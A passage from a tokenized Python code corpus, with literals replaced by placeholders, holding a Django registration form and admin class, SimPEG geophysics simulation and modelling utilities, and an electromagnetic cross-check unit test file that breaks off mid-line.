<s> from django import forms <EOL> from django . contrib . auth . models import User <EOL> from django . utils . translation import ugettext as _ <EOL> from django . conf import settings <EOL> import re <EOL> username_re = re . compile ( '<STR_LIT>' ) <EOL> class RegistrationForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> username = forms . CharField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:30> ) <EOL> password1 = forms . CharField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:16> , widget = forms . PasswordInput ) <EOL> password2 = forms . CharField ( label = _ ( "<STR_LIT>" ) , max_length = <NUM_LIT:16> , widget = forms . PasswordInput ) <EOL> def clean_username ( self ) : <EOL> username = self . cleaned_data . get ( "<STR_LIT:username>" ) . lower ( ) <EOL> if username in getattr ( settings , '<STR_LIT>' , [ ] ) : <EOL> raise forms . ValidationError ( _ ( <EOL> '<STR_LIT>' <EOL> ) ) <EOL> try : <EOL> User . objects . get ( username = username ) <EOL> except User . DoesNotExist : <EOL> if not username_re . match ( username ) : <EOL> raise forms . ValidationError ( _ ( <EOL> "<STR_LIT>" <EOL> ) ) <EOL> return username <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> def clean ( self ) : <EOL> if '<STR_LIT>' in self . cleaned_data and '<STR_LIT>' in self . cleaned_data : <EOL> if self . cleaned_data [ '<STR_LIT>' ] != self . cleaned_data [ '<STR_LIT>' ] : <EOL> raise forms . ValidationError ( _ ( u'<STR_LIT>' ) ) <EOL> return self . cleaned_data <EOL> def save ( self , request , profile_cb = None ) : <EOL> args = [ <EOL> self . cleaned_data [ "<STR_LIT:username>" ] , <EOL> self . cleaned_data [ "<STR_LIT:username>" ] + '<STR_LIT>' , <EOL> self . cleaned_data [ "<STR_LIT>" ] <EOL> ] <EOL> user = User . objects . create_user ( * args ) <EOL> if profile_cb is not None : <EOL> profile_cb ( user ) <EOL> return user , self . cleaned_data [ "<STR_LIT>" ] </s>
<s> from django . contrib import admin <EOL> from django . utils . safestring import mark_safe <EOL> from models import SourceImage , CropSize , CroppedImage <EOL> admin . site . register ( SourceImage ) <EOL> admin . site . register ( CropSize ) <EOL> class CroppedImageAdmin ( admin . ModelAdmin ) : <EOL> change_form_template = '<STR_LIT>' <EOL> def get_form ( self , request , obj = None , ** kwargs ) : <EOL> if obj is None : <EOL> fields = ( '<STR_LIT:source>' , '<STR_LIT:size>' ) <EOL> else : <EOL> fields = ( '<STR_LIT:source>' , '<STR_LIT:size>' , '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:w>' , '<STR_LIT:h>' ) <EOL> kwargs [ '<STR_LIT>' ] = fields <EOL> return super ( CroppedImageAdmin , self ) . get_form ( request , obj , ** kwargs ) <EOL> def preview_thumb ( self , obj ) : <EOL> if obj . image : <EOL> return mark_safe ( <EOL> u'<STR_LIT>' % obj . image . url <EOL> ) <EOL> else : <EOL> return None <EOL> preview_thumb . allow_tags = True <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:size>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT:size>' , ) <EOL> admin . site . register ( CroppedImage , CroppedImageAdmin ) </s>
<s> from BaseDC import * <EOL> from BaseIP import * <EOL> from DCIPUtils import * <EOL> import Utils </s>
<s> from SimPEG import * <EOL> from SimPEG . FLOW import Richards <EOL> def run ( plotIt = True ) : <EOL> """<STR_LIT>""" <EOL> M = Mesh . TensorMesh ( [ np . ones ( <NUM_LIT> ) ] ) <EOL> M . setCellGradBC ( '<STR_LIT>' ) <EOL> params = Richards . Empirical . HaverkampParams ( ) . celia1990 <EOL> params [ '<STR_LIT>' ] = np . log ( params [ '<STR_LIT>' ] ) <EOL> E = Richards . Empirical . Haverkamp ( M , ** params ) <EOL> bc = np . array ( [ - <NUM_LIT> , - <NUM_LIT> ] ) <EOL> h = np . zeros ( M . nC ) + bc [ <NUM_LIT:0> ] <EOL> def getFields ( timeStep , method ) : <EOL> timeSteps = np . ones ( <NUM_LIT> / timeStep ) * timeStep <EOL> prob = Richards . RichardsProblem ( M , mapping = E , timeSteps = timeSteps , <EOL> boundaryConditions = bc , initialConditions = h , <EOL> doNewton = False , method = method ) <EOL> return prob . fields ( params [ '<STR_LIT>' ] ) <EOL> Hs_M10 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_M30 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_M120 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_H10 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_H30 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> Hs_H120 = getFields ( <NUM_LIT> , '<STR_LIT>' ) <EOL> if not plotIt : return <EOL> import matplotlib . pyplot as plt <EOL> plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:5> ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_M10 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_M30 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_M120 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . ylim ( [ - <NUM_LIT> , - <NUM_LIT:10> ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . legend ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_H10 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_H30 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . plot ( <NUM_LIT> - M . gridCC , Hs_H120 [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . ylim ( [ - <NUM_LIT> , - <NUM_LIT:10> ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . legend ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> plt . show ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> import numpy as np , SimPEG as simpeg <EOL> from scipy . constants import mu_0 , epsilon_0 as eps_0 <EOL> def getEHfields ( m1d , sigma , freq , zd , scaleUD = True ) : <EOL> '''<STR_LIT>''' <EOL> mu = mu_0 * np . ones ( ( m1d . nC + <NUM_LIT:1> ) ) <EOL> eps = eps_0 * np . ones ( ( m1d . nC + <NUM_LIT:1> ) ) <EOL> w = <NUM_LIT:2> * np . pi * freq <EOL> sig = np . concatenate ( ( np . array ( [ sigma [ <NUM_LIT:0> ] ] ) , sigma ) ) <EOL> k = np . sqrt ( eps * mu * w ** <NUM_LIT:2> - <NUM_LIT> * mu * sig * w ) <EOL> UDp = np . zeros ( ( <NUM_LIT:2> , m1d . nC + <NUM_LIT:1> ) , dtype = complex ) <EOL> UDp [ <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT:1.> <EOL> for lnr , h in enumerate ( m1d . hx ) : <EOL> yp1 = k [ lnr ] / ( w * mu [ lnr ] ) <EOL> zp = ( w * mu [ lnr + <NUM_LIT:1> ] ) / k [ lnr + <NUM_LIT:1> ] <EOL> Pj1 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ yp1 , - yp1 ] ] ) <EOL> Pjinv = <NUM_LIT:1.> / <NUM_LIT:2> * np . array ( [ [ <NUM_LIT:1> , zp ] , [ <NUM_LIT:1> , - zp ] ] ) <EOL> elamh = np . array ( [ [ np . exp ( - <NUM_LIT> * k [ lnr + <NUM_LIT:1> ] * h ) , <NUM_LIT:0> ] , [ <NUM_LIT:0> , np . exp ( <NUM_LIT> * k [ lnr + <NUM_LIT:1> ] * h ) ] ] ) <EOL> UDp [ : , lnr + <NUM_LIT:1> ] = elamh . dot ( Pjinv . dot ( Pj1 ) ) . dot ( UDp [ : , lnr ] ) <EOL> if scaleUD : <EOL> UDp [ : , lnr + <NUM_LIT:1> : : - <NUM_LIT:1> ] = UDp [ : , lnr + <NUM_LIT:1> : : - <NUM_LIT:1> ] / UDp [ <NUM_LIT:1> , lnr + <NUM_LIT:1> ] <EOL> Ed = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> Eu = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> Hd = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> Hu = np . empty ( ( zd . size , ) , dtype = complex ) <EOL> dup = m1d . vectorNx [ <NUM_LIT:0> ] <EOL> dind = dup >= zd <EOL> Ed [ dind ] = UDp [ <NUM_LIT:1> , <NUM_LIT:0> ] * np . exp ( - <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> Eu [ dind ] = UDp [ <NUM_LIT:0> , <NUM_LIT:0> ] * np . exp ( <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> Hd [ dind ] = ( k [ <NUM_LIT:0> ] / ( w * mu [ <NUM_LIT:0> ] ) ) * UDp [ <NUM_LIT:1> , <NUM_LIT:0> ] * np . exp ( - <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> Hu [ dind ] = - ( k [ <NUM_LIT:0> ] / ( w * mu [ <NUM_LIT:0> ] ) ) * UDp [ <NUM_LIT:0> , <NUM_LIT:0> ] * np . exp ( <NUM_LIT> * k [ <NUM_LIT:0> ] * ( dup - zd [ dind ] ) ) <EOL> for ki , mui , epsi , dlow , dup , Up , Dp in zip ( k [ <NUM_LIT:1> : : ] , mu [ <NUM_LIT:1> : : ] , eps [ <NUM_LIT:1> : : ] , m1d . vectorNx [ : - <NUM_LIT:1> ] , m1d . vectorNx [ <NUM_LIT:1> : : ] , UDp [ <NUM_LIT:0> , <NUM_LIT:1> : : ] , UDp [ <NUM_LIT:1> , <NUM_LIT:1> : : ] ) : <EOL> dind = np . logical_and ( dup >= zd , zd > dlow ) <EOL> Ed [ dind ] = Dp * np . exp ( - <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> Eu [ dind ] = Up * np . exp ( <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> Hd [ dind ] = ( ki / ( w * mui ) ) * Dp * np . exp ( - <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> Hu [ dind ] = - ( ki / ( w * mui ) ) * Up * np . exp ( <NUM_LIT> * ki * ( dup - zd [ dind ] ) ) <EOL> return Ed , Eu , Hd , Hu <EOL> def getImpedance ( m1d , sigma , freq ) : <EOL> """<STR_LIT>""" <EOL> Z1d = np . empty ( len ( freq ) , dtype = '<STR_LIT>' ) <EOL> h = m1d . hx <EOL> for nrFr , fr in enumerate ( freq ) : <EOL> om = <NUM_LIT:2> * np . pi * fr <EOL> Zall = np . empty ( len ( h ) + <NUM_LIT:1> , dtype = '<STR_LIT>' ) <EOL> Zall [ <NUM_LIT:0> ] = ( mu_0 * om ) / np . sqrt ( mu_0 * eps_0 * ( om ) ** <NUM_LIT:2> - <NUM_LIT> * mu_0 * sigma [ <NUM_LIT:0> ] * om ) <EOL> for nr , hi in enumerate ( h ) : <EOL> k = np . sqrt ( mu_0 * eps_0 * om ** <NUM_LIT:2> - <NUM_LIT> * mu_0 * sigma [ nr ] * om ) <EOL> Z = ( mu_0 * om ) / k <EOL> Zall [ nr + <NUM_LIT:1> ] = Z * ( ( Zall [ nr ] + Z * np . tanh ( <NUM_LIT> * k * hi ) ) / ( Z + Zall [ nr ] * np . tanh ( <NUM_LIT> * k * hi ) ) ) <EOL> Z1d [ nrFr ] = Zall [ - <NUM_LIT:1> ] <EOL> return Z1d </s>
<s> import numpy as np <EOL> import scipy . ndimage as ndi <EOL> import scipy . sparse as sp <EOL> from matutils import mkvc <EOL> def addBlock ( gridCC , modelCC , p0 , p1 , blockProp ) : <EOL> """<STR_LIT>""" <EOL> ind = getIndicesBlock ( p0 , p1 , gridCC ) <EOL> modelBlock = modelCC . copy ( ) <EOL> modelBlock [ ind ] = blockProp <EOL> return modelBlock <EOL> def getIndicesBlock ( p0 , p1 , ccMesh ) : <EOL> """<STR_LIT>""" <EOL> assert len ( p0 ) == len ( p1 ) , "<STR_LIT>" <EOL> dimMesh = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> assert len ( p0 ) == dimMesh , "<STR_LIT>" <EOL> for ii in range ( len ( p0 ) ) : <EOL> p0 [ ii ] , p1 [ ii ] = np . min ( [ p0 [ ii ] , p1 [ ii ] ] ) , np . max ( [ p0 [ ii ] , p1 [ ii ] ] ) <EOL> if dimMesh == <NUM_LIT:1> : <EOL> x1 = p0 [ <NUM_LIT:0> ] <EOL> x2 = p1 [ <NUM_LIT:0> ] <EOL> indX = ( x1 <= ccMesh [ : , <NUM_LIT:0> ] ) & ( ccMesh [ : , <NUM_LIT:0> ] <= x2 ) <EOL> ind = np . where ( indX ) <EOL> elif dimMesh == <NUM_LIT:2> : <EOL> x1 = p0 [ <NUM_LIT:0> ] <EOL> y1 = p0 [ <NUM_LIT:1> ] <EOL> x2 = p1 [ <NUM_LIT:0> ] <EOL> y2 = p1 [ <NUM_LIT:1> ] <EOL> indX = ( x1 <= ccMesh [ : , <NUM_LIT:0> ] ) & ( ccMesh [ : , <NUM_LIT:0> ] <= x2 ) <EOL> indY = ( y1 <= ccMesh [ : , <NUM_LIT:1> ] ) & ( ccMesh [ : , <NUM_LIT:1> ] <= y2 ) <EOL> ind = np . where ( indX & indY ) <EOL> elif dimMesh == <NUM_LIT:3> : <EOL> x1 = p0 [ <NUM_LIT:0> ] <EOL> y1 = p0 [ <NUM_LIT:1> ] <EOL> z1 = p0 [ <NUM_LIT:2> ] <EOL> x2 = p1 [ <NUM_LIT:0> ] <EOL> y2 = p1 [ <NUM_LIT:1> ] <EOL> z2 = p1 [ <NUM_LIT:2> ] <EOL> indX = ( x1 <= ccMesh [ : , <NUM_LIT:0> ] ) & ( ccMesh [ : , <NUM_LIT:0> ] <= x2 ) <EOL> indY = ( y1 <= ccMesh [ : , <NUM_LIT:1> ] ) & ( ccMesh [ : , <NUM_LIT:1> ] <= y2 ) <EOL> indZ = ( z1 <= ccMesh [ : , <NUM_LIT:2> ] ) & ( ccMesh [ : , <NUM_LIT:2> ] <= z2 ) <EOL> ind = np . where ( indX & indY & indZ ) <EOL> return ind <EOL> def defineBlock ( ccMesh , p0 , p1 , vals = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> sigma = np . zeros ( ccMesh . shape [ <NUM_LIT:0> ] ) + vals [ <NUM_LIT:1> ] <EOL> ind = getIndicesBlock ( p0 , p1 , ccMesh ) <EOL> sigma [ ind ] = vals [ <NUM_LIT:0> ] <EOL> return mkvc ( sigma ) <EOL> def defineElipse ( ccMesh , center = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , anisotropy = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , slope = <NUM_LIT> , theta = <NUM_LIT:0.> ) : <EOL> G = ccMesh . copy ( ) <EOL> dim = ccMesh . shape [ <NUM_LIT:1> ] <EOL> for i in range ( dim ) : <EOL> G [ : , i ] = G [ : , i ] - center [ i ] <EOL> theta = - theta * np . pi / <NUM_LIT> <EOL> M = np . array ( [ [ np . cos ( theta ) , - np . sin ( theta ) , <NUM_LIT:0> ] , [ np . sin ( theta ) , np . cos ( theta ) , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1.> ] ] ) <EOL> M = M [ : dim , : dim ] <EOL> G = M . dot ( G . T ) . T <EOL> for i in range ( dim ) : <EOL> G [ : , i ] = G [ : , i ] / anisotropy [ i ] * <NUM_LIT> <EOL> D = np . sqrt ( np . sum ( G ** <NUM_LIT:2> , axis = <NUM_LIT:1> ) ) <EOL> return - np . arctan ( ( D - <NUM_LIT:1> ) * slope ) * ( <NUM_LIT> / np . pi ) / <NUM_LIT> + <NUM_LIT:0.5> <EOL> def getIndicesSphere ( center , radius , ccMesh ) : <EOL> """<STR_LIT>""" <EOL> dimMesh = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> assert len ( center ) == dimMesh , "<STR_LIT>" <EOL> if dimMesh == <NUM_LIT:1> : <EOL> ind = np . abs ( center [ <NUM_LIT:0> ] - ccMesh [ : , <NUM_LIT:0> ] ) < radius <EOL> elif dimMesh == <NUM_LIT:2> : <EOL> ind = np . sqrt ( ( center [ <NUM_LIT:0> ] - ccMesh [ : , <NUM_LIT:0> ] ) ** <NUM_LIT:2> + ( center [ <NUM_LIT:1> ] - ccMesh [ : , <NUM_LIT:1> ] ) ** <NUM_LIT:2> ) < radius <EOL> elif dimMesh == <NUM_LIT:3> : <EOL> ind = np . sqrt ( ( center [ <NUM_LIT:0> ] - ccMesh [ : , <NUM_LIT:0> ] ) ** <NUM_LIT:2> + ( center [ <NUM_LIT:1> ] - ccMesh [ : , <NUM_LIT:1> ] ) ** <NUM_LIT:2> + ( center [ <NUM_LIT:2> ] - ccMesh [ : , <NUM_LIT:2> ] ) ** <NUM_LIT:2> ) < radius <EOL> return ind <EOL> def defineTwoLayers ( ccMesh , depth , vals = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> sigma = np . zeros ( ccMesh . shape [ <NUM_LIT:0> ] ) + vals [ <NUM_LIT:1> ] <EOL> dim = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> p0 = np . zeros ( dim ) <EOL> p1 = np . zeros ( dim ) <EOL> p0 [ <NUM_LIT:0> ] = ccMesh [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if dim > <NUM_LIT:1> : p0 [ <NUM_LIT:1> ] = ccMesh [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> if dim > <NUM_LIT:2> : p0 [ <NUM_LIT:2> ] = ccMesh [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> p1 [ <NUM_LIT:0> ] = ccMesh [ - <NUM_LIT:1> , <NUM_LIT:0> ] <EOL> if dim > <NUM_LIT:1> : p1 [ <NUM_LIT:1> ] = ccMesh [ - <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> if dim > <NUM_LIT:2> : p1 [ <NUM_LIT:2> ] = ccMesh [ - <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> p1 [ len ( p1 ) - <NUM_LIT:1> ] -= depth <EOL> ind = getIndicesBlock ( p0 , p1 , ccMesh ) <EOL> sigma [ ind ] = vals [ <NUM_LIT:0> ] ; <EOL> return mkvc ( sigma ) <EOL> def scalarConductivity ( ccMesh , pFunction ) : <EOL> """<STR_LIT>""" <EOL> dim = np . size ( ccMesh [ <NUM_LIT:0> , : ] ) <EOL> CC = [ ccMesh [ : , <NUM_LIT:0> ] ] <EOL> if dim > <NUM_LIT:1> : CC . append ( ccMesh [ : , <NUM_LIT:1> ] ) <EOL> if dim > <NUM_LIT:2> : CC . append ( ccMesh [ : , <NUM_LIT:2> ] ) <EOL> sigma = pFunction ( * CC ) <EOL> return mkvc ( sigma ) <EOL> def layeredModel ( ccMesh , layerTops , layerValues ) : <EOL> """<STR_LIT>""" <EOL> descending = np . linalg . norm ( sorted ( layerTops , reverse = True ) - layerTops ) < <NUM_LIT> <EOL> if not descending : <EOL> zprop = np . hstack ( [ mkvc ( layerTops , <NUM_LIT:2> ) , mkvc ( layerValues , <NUM_LIT:2> ) ] ) <EOL> zprop . sort ( axis = <NUM_LIT:0> ) <EOL> layerTops , layerValues = zprop [ : : - <NUM_LIT:1> , <NUM_LIT:0> ] , zprop [ : : - <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> layerTops , layerValues = mkvc ( layerTops ) , mkvc ( layerValues ) <EOL> dim = ccMesh . shape [ <NUM_LIT:1> ] <EOL> if dim == <NUM_LIT:3> : <EOL> z = ccMesh [ : , <NUM_LIT:2> ] <EOL> elif dim == <NUM_LIT:2> : <EOL> z = ccMesh [ : , <NUM_LIT:1> ] <EOL> elif dim == <NUM_LIT:1> : <EOL> z = ccMesh [ : , <NUM_LIT:0> ] <EOL> model = np . zeros ( ccMesh . shape [ <NUM_LIT:0> ] ) <EOL> for i , top in enumerate ( layerTops ) : <EOL> zind = z <= top <EOL> model [ zind ] = layerValues [ i ] <EOL> return model <EOL> def randomModel ( shape , seed = None , anisotropy = None , its = <NUM_LIT:100> , bounds = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> if seed is None : <EOL> seed = np . random . randint ( <NUM_LIT> ) <EOL> print '<STR_LIT>' , seed <EOL> if type ( shape ) in [ int , long , float ] : <EOL> shape = ( shape , ) <EOL> np . random . seed ( seed ) <EOL> mr = np . random . rand ( * shape ) <EOL> if anisotropy is None : <EOL> if len ( shape ) is <NUM_LIT:1> : <EOL> smth = np . array ( [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ] , dtype = float ) <EOL> elif len ( shape ) is <NUM_LIT:2> : <EOL> smth = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:10> , <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:1> ] ] , dtype = float ) <EOL> elif len ( shape ) is <NUM_LIT:3> : <EOL> kernal = np . array ( [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:1> ] , dtype = float ) . reshape ( ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> smth = np . array ( sp . kron ( sp . kron ( kernal , kernal . T ) . todense ( ) [ : ] , kernal ) . todense ( ) ) . reshape ( ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> else : <EOL> assert len ( anisotropy . shape ) is len ( shape ) , '<STR_LIT>' <EOL> smth = np . array ( anisotropy , dtype = float ) <EOL> smth = smth / smth . sum ( ) <EOL> mi = mr <EOL> for i in range ( its ) : <EOL> mi = ndi . convolve ( mi , smth ) <EOL> mi = ( mi - mi . min ( ) ) / ( mi . max ( ) - mi . min ( ) ) <EOL> mi = mi * ( bounds [ <NUM_LIT:1> ] - bounds [ <NUM_LIT:0> ] ) + bounds [ <NUM_LIT:0> ] <EOL> return mi <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from SimPEG . Mesh import TensorMesh <EOL> from matplotlib import pyplot as plt <EOL> testDim = <NUM_LIT:2> <EOL> h1 = <NUM_LIT> * np . ones ( <NUM_LIT:7> ) <EOL> h1 [ <NUM_LIT:0> ] = <NUM_LIT:0.5> <EOL> h1 [ - <NUM_LIT:1> ] = <NUM_LIT> <EOL> h2 = <NUM_LIT> * np . ones ( <NUM_LIT:4> ) <EOL> h3 = <NUM_LIT> * np . ones ( <NUM_LIT:6> ) <EOL> x0 = np . zeros ( <NUM_LIT:3> ) <EOL> if testDim == <NUM_LIT:1> : <EOL> h = [ h1 ] <EOL> x0 = x0 [ <NUM_LIT:0> ] <EOL> elif testDim == <NUM_LIT:2> : <EOL> h = [ h1 , h2 ] <EOL> x0 = x0 [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> else : <EOL> h = [ h1 , h2 , h3 ] <EOL> M = TensorMesh ( h , x0 ) <EOL> ccMesh = M . gridCC <EOL> print ( '<STR_LIT>' ) <EOL> p0 = np . array ( [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ] ) [ : testDim ] <EOL> p1 = np . array ( [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) [ : testDim ] <EOL> vals = np . array ( [ <NUM_LIT:100> , <NUM_LIT> ] ) <EOL> sigma = defineBlockConductivity ( ccMesh , p0 , p1 , vals ) <EOL> print sigma . shape <EOL> M . plotImage ( sigma ) <EOL> print '<STR_LIT>' <EOL> plt . show ( ) <EOL> print ( '<STR_LIT>' ) <EOL> vals = np . array ( [ <NUM_LIT:100> , <NUM_LIT> ] ) ; <EOL> depth = <NUM_LIT:1.0> ; <EOL> sigma = defineTwoLayeredConductivity ( ccMesh , depth , vals ) <EOL> M . plotImage ( sigma ) <EOL> print sigma <EOL> print '<STR_LIT>' <EOL> plt . show ( ) <EOL> print ( '<STR_LIT>' ) <EOL> if testDim == <NUM_LIT:1> : <EOL> pFunction = lambda x : np . exp ( x ) <EOL> elif testDim == <NUM_LIT:2> : <EOL> pFunction = lambda x , y : np . exp ( x + y ) <EOL> elif testDim == <NUM_LIT:3> : <EOL> pFunction = lambda x , y , z : np . exp ( x + y + z ) <EOL> sigma = scalarConductivity ( ccMesh , pFunction ) <EOL> M . plotImage ( sigma ) <EOL> print sigma <EOL> print '<STR_LIT>' <EOL> plt . show ( ) </s>
<s> import unittest <EOL> from SimPEG import * <EOL> from SimPEG import EM <EOL> import sys <EOL> from scipy . constants import mu_0 <EOL> from SimPEG . EM . Utils . testingUtils import getFDEMProblem , crossCheckTest <EOL> testEB = True <EOL> testHJ = True <EOL> testEJ = True <EOL> testBH = True <EOL> verbose = False <EOL> TOLEBHJ = <NUM_LIT> <EOL> TOLEJHB = <NUM_LIT:1> <EOL> SrcList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class FDEM_CrossCheck ( unittest . TestCase ) : <EOL> if testEB : <EOL> def test_EB_CrossCheck_exr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_eyr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_ezr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_exi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_eyi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_ezi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bxr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_byr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bzr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bxi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_byi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bzi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> if testHJ : <EOL> def test_HJ_CrossCheck_jxr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jyr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jzr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jxi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jyi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jzi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hxr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , 